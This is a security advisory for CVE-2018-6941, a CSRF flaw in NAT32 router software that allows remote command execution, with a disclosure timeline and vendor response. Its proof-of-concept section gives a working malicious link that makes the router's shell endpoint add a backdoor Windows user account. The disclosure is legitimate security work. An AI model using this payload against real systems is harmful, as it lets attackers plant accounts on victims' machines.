75 lines
No EOL
2.3 KiB
Text
75 lines
No EOL
2.3 KiB
Text
[+] Credits: hyp3rlinx
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CSRF-CVE-2018-6941.txt
|
|
[+] ISR: Apparition Security
|
|
|
|
[-_-] D1rty0tis
|
|
|
|
|
|
Vendor:
|
|
=============
|
|
www.nat32.com
|
|
|
|
|
|
Product:
|
|
===========
|
|
NAT32 Build (22284)
|
|
|
|
NAT32® is a versatile IP Router implemented as a WIN32 application.
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Remote Command Execution (CSRF)
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2018-6941
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
CSRF issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution.
|
|
|
|
Remote attackers can potentially execute arbitrary System Commands due to a Cross Site Request Forgery, if an authenticated NAT32 user clicks a malicious link
|
|
or visits an attacker controlled webpage as NAT32 performs no check for blind requests.
|
|
|
|
Its also worth mentioning is NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily revealed if sniffed on network.
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
<a href="http://VICTIM-IP:8080/shell?cmd=exec+net%20user%20HACKER%20abc123%20/add">Backdoor clicker</a>
|
|
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Remote
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: February 9, 2018
|
|
Vendor acknowledgement: February 9, 2018
|
|
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018
|
|
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018
|
|
February 14, 2018 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c). |